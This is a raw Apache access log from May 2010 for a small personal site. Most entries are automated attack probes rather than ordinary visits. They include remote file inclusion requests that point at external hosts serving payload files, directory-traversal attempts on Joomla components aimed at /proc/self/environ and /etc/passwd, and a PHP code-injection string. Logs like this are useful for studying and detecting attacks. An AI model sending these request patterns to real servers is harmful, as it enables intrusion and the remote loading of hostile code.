125.248.34.130 - - [20/May/2010:03:16:41 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.180.86.111 - - [20/May/2010:03:17:06 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.pt/url?sa=t&source=web&ct=res&cd=19&ved=0CEMQFjAIOAo&url=http%3A%2F%2Ftomdolan.pconline.com%2Ftattoo%2Ftattoo1.htm&rct=j&q=vintage+flash.com&ei=-O_0S9LALYacOMqquOoI&usg=AFQjCNHjrXnOYOTb8B7m3-3jlFkAbM0Ulw""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; DEL 1.0.195.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
89.180.86.111 - - [20/May/2010:03:17:07 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; DEL 1.0.195.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
211.180.203.200 - - [20/May/2010:03:17:08 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
89.180.86.111 - - [20/May/2010:03:17:10 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; DEL 1.0.195.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)"
211.180.203.200 - - [20/May/2010:03:17:42 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:03:18:40 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:03:19:38 -0500] "GET /logs/access_log.1212192000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.133.201.194 - - [20/May/2010:03:19:39 -0500] "GET /logs/access_log.1270598400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:03:19:39 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:03:19:39 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:03:20:32 -0500] "GET /logs/access_log.1265414400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:03 -0500] "GET /logs/access_log.1266278400//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:03 -0500] "GET //ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:03 -0500] "GET /logs//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.46.195.226 - - [20/May/2010:03:24:05 -0500] "GET /logs/access_log.1164585600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [20/May/2010:03:24:06 -0500] "GET /logs//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:06 -0500] "GET /logs/access_log.1266278400//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:06 -0500] "GET //ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:14 -0500] "GET /logs/access_log.1266537600//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:24:39 -0500] "GET /logs/access_log.1266537600//ashnews.php?pathtoashnews=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:03:24:50 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:03:24:50 -0500] "GET /logs/access_log.1270857600%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.201.194 - - [20/May/2010:03:24:50 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:03:25:15 -0500] "GET /logs/access_log.1168560000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/May/2010:03:26:05 -0500] "GET /logs/access_log.1199145600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.177 - - [20/May/2010:03:39:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:03:41:07 -0500] "GET /logs/access_log.1185840000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
112.216.153.186 - - [20/May/2010:03:41:23 -0500] "GET /logs/access_log.1270944000//skin/ggambo6010_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:03:41:23 -0500] "GET //skin/ggambo6010_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
112.216.153.186 - - [20/May/2010:03:41:23 -0500] "GET /logs//skin/ggambo6010_board/write.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
38.101.148.126 - - [20/May/2010:03:43:45 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [20/May/2010:03:43:52 -0500] "GET /logs/access_log.1255219200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
87.250.255.243 - - [20/May/2010:03:47:01 -0500] "GET /logs/access_log.1196640000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.190 - - [20/May/2010:03:50:05 -0500] "GET /logs/access_log.1251504000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:03:52:33 -0500] "GET /logs/access_log.1175731200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
210.109.108.186 - - [20/May/2010:03:56:12 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:03:56:12 -0500] "GET /logs/access_log.1271548800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:03:56:12 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:03:57:24 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:03:57:24 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:03:57:24 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
210.109.108.186 - - [20/May/2010:03:57:46 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.arabnewswest.com/images/zfxid1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:57:47 -0500] "GET /logs/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:57:47 -0500] "GET /solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:57:47 -0500] "GET /logs/access_log.1272844800%20%20/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:57:50 -0500] "GET /logs/access_log.1272844800%20%20/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:57:50 -0500] "GET /solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:57:50 -0500] "GET /logs/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:58:34 -0500] "GET /logs/access_log.1273104000%20%20/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:03:59:01 -0500] "GET /logs/access_log.1210723200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.40.30.37 - - [20/May/2010:03:59:07 -0500] "GET /logs/access_log.1273104000%20%20/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:03:59:50 -0500] "GET /logs/access_log.1272844800/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
208.115.111.248 - - [20/May/2010:04:00:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
84.40.30.37 - - [20/May/2010:04:00:07 -0500] "GET /logs/access_log.1272844800/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:04:01:28 -0500] "GET /logs/access_log.1266537600/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:04:01:29 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:04:01:55 -0500] "GET /logs/access_log.1265673600/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
84.40.30.37 - - [20/May/2010:04:01:55 -0500] "GET /logs/access_log.1266537600/solpot.html?body=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:04:07:00 -0500] "GET /logs/access_log.1258416000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
94.125.182.40 - - [20/May/2010:04:09:23 -0500] "GET //join.php?FORM[url]=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
94.125.182.40 - - [20/May/2010:04:09:23 -0500] "GET /logs//join.php?FORM[url]=http://grezz.interfree.it/id.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
87.250.255.243 - - [20/May/2010:04:12:33 -0500] "GET /logs/access_log.1261958400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/May/2010:04:17:09 -0500] "GET /logs/access_log.1166486400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
121.190.102.21 - - [20/May/2010:04:17:49 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:04:17:49 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:04:17:49 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 200 6280 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:04:17:56 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:04:17:56 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 200 6280 "-""Mozilla/5.0"
121.190.102.21 - - [20/May/2010:04:17:56 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://www.armycadetleagueab.ca/cache/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.239.161.143 - - [20/May/2010:04:18:19 -0500] "GET /logs/access_log.1271548800/send_reminders.php?includedir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.239.161.143 - - [20/May/2010:04:18:19 -0500] "GET /send_reminders.php?includedir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
211.239.161.143 - - [20/May/2010:04:18:19 -0500] "GET /logs/send_reminders.php?includedir=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.195.112.180 - - [20/May/2010:04:20:29 -0500] "GET /logs/access_log.1209859200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.235.124.132 - - [20/May/2010:04:22:11 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [20/May/2010:04:22:11 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
207.46.13.143 - - [20/May/2010:04:23:35 -0500] "GET /logs/access_log.1234396800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:04:24:46 -0500] "GET /logs/access_log.1205107200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.180.203.200 - - [20/May/2010:04:25:04 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:04:25:04 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
211.180.203.200 - - [20/May/2010:04:25:05 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:04:29:24 -0500] "GET /logs/access_log.1183507200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.121.158.8 - - [20/May/2010:04:34:35 -0500] "GET /logs/index.php?option=com_realtyna&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""-"
174.121.158.8 - - [20/May/2010:04:34:35 -0500] "GET /index.php?option=com_realtyna&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [20/May/2010:04:34:35 -0500] "GET /index.php?option=com_realtyna&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 293 "-""-"
174.121.158.8 - - [20/May/2010:04:34:35 -0500] "GET /logs/index.php?option=com_realtyna&controller=./../../../../../../../../etc/passwd HTTP/1.1" 404 298 "-""-"
87.250.255.243 - - [20/May/2010:04:37:41 -0500] "GET /logs/access_log.1180051200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.43.122.86 - - [20/May/2010:04:38:48 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
208.43.122.86 - - [20/May/2010:04:38:48 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.250.255.243 - - [20/May/2010:04:43:28 -0500] "GET /logs/access_log.1195689600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.55.52.154 - - [20/May/2010:04:45:12 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:04:45:13 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
207.46.199.45 - - [20/May/2010:04:46:05 -0500] "GET /logs/access_log.1158019200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.106.26.60 - - [20/May/2010:04:46:34 -0500] "GET //errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:04:46:34 -0500] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
82.98.135.6 - - [20/May/2010:04:47:06 -0500] "GET /logs/access_log.1265414400//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.98.135.6 - - [20/May/2010:04:47:06 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
82.98.135.6 - - [20/May/2010:04:47:06 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
208.115.111.248 - - [20/May/2010:04:47:34 -0500] "GET /logs/access_log.1222041600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:47:36 -0500] "GET /logs/access_log.1222214400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:47:38 -0500] "GET /logs/access_log.1222300800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:47:41 -0500] "GET /logs/access_log.1222560000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:48:08 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:48:12 -0500] "GET /logs/access_log.1222905600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:48:15 -0500] "GET /logs/access_log.1222992000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:48:17 -0500] "GET /logs/access_log.1223164800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:48:19 -0500] "GET /logs/access_log.1223251200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:04:48:22 -0500] "GET /logs/access_log.1223510400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
92.241.190.214 - - [20/May/2010:04:48:55 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.249.129.245 - - [20/May/2010:04:50:05 -0500] "GET /logs/access_log.1273276800/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.129.245 - - [20/May/2010:04:50:05 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.249.129.245 - - [20/May/2010:04:50:05 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [20/May/2010:04:50:51 -0500] "GET /logs/access_log.1248739200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.186 - - [20/May/2010:04:52:05 -0500] "GET /logs/access_log.1254787200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
82.98.135.6 - - [20/May/2010:04:54:37 -0500] "GET /logs/access_log.1263427200//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
92.241.190.214 - - [20/May/2010:04:55:42 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
92.241.190.214 - - [20/May/2010:04:55:42 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
92.241.190.214 - - [20/May/2010:04:55:43 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:04:57:18 -0500] "GET /logs/access_log.1220832000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.241.190.214 - - [20/May/2010:04:58:52 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
92.241.190.214 - - [20/May/2010:04:58:52 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
92.241.190.214 - - [20/May/2010:04:58:53 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
178.32.3.34 - - [20/May/2010:05:00:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:00:00 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
178.32.3.34 - - [20/May/2010:05:00:01 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
218.48.202.44 - - [20/May/2010:05:00:15 -0500] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.48.202.44 - - [20/May/2010:05:00:15 -0500] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
